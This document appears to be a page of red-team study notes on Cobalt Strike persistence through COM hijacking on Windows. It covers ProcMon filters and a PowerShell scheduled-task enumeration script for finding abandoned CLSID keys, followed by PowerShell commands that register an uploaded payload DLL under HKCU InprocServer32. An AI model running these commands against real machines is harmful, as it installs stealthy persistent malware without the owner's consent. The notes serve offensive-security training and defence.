Security Memo

Search (Ctrl+K)

SearchSearch

Recent Notes

See 1423 more sorted by tag →

Cobalt Strike persistence through COM hijacking

created Jan 08, 2024updated Jan 23, 20242 min read

Although it is possible to modify COM objects in use, it might break certain applications and lose stealth. A better way is to look for abandoned registry keys (which applications attempt to access but don’t actually exist in the registry hive).

Finding Abandoned Keys (ProcMon)

Process Monitor from Sysinternals Suite is useful for hunting potential COM hijacks. If not possible to use on target machine, use it on own machine first (similar Windows version probably necessary).

Set the filter to:

  • RegOpenKey operations
  • and result is NAME NOT FOUND{.verbatim}
  • and path ends with InprocServer32{.verbatim}

Finding Abandoned Keys (Task Scheduler)

Another way to find abandoned keys is through task scheduler:

$Tasks = Get-ScheduledTask
 
foreach ($Task in $Tasks)
{
    if (($Task.Actions.ClassId -ne $null)
        -and ($Task.Triggers.Enabled -eq $true)
        -and ($Task.Principal.GroupId -eq "Users"))
    {
        Write-Host "Task Name: " $Task.TaskName
        Write-Host "Task Path: " $Task.TaskPath
        Write-Host "CLSID: " $Task.Actions.ClassId
        Write-Host
    }
}

Say the CLSID is {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}{.verbatim}. Make sure to check first whether the task is reboot-persistent (in Task Scheduler or in PowerShell). Often, we can see that the COM object is defined in HKCR: Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" . The same applies to HKLM. Where the hijacking comes is HKCU

Hijacking

Say from the above steps we find a suitable abandoned key HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32{.verbatim} shows up in the event list, we can use Get-Item -Path "HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" to confirm that it doesn’t exist.

To hijack the nonexistent COM hijack (after first uploading the DLL) (pretend this is the target machine, not the attacker’s):

PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\Payloads\http_x64.dll"
PS C:\Users\Attacker> New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

Clean up after yourself

Remember to delete both the registry entries in HKCU and the associated DLL file.

Graph View

Backlinks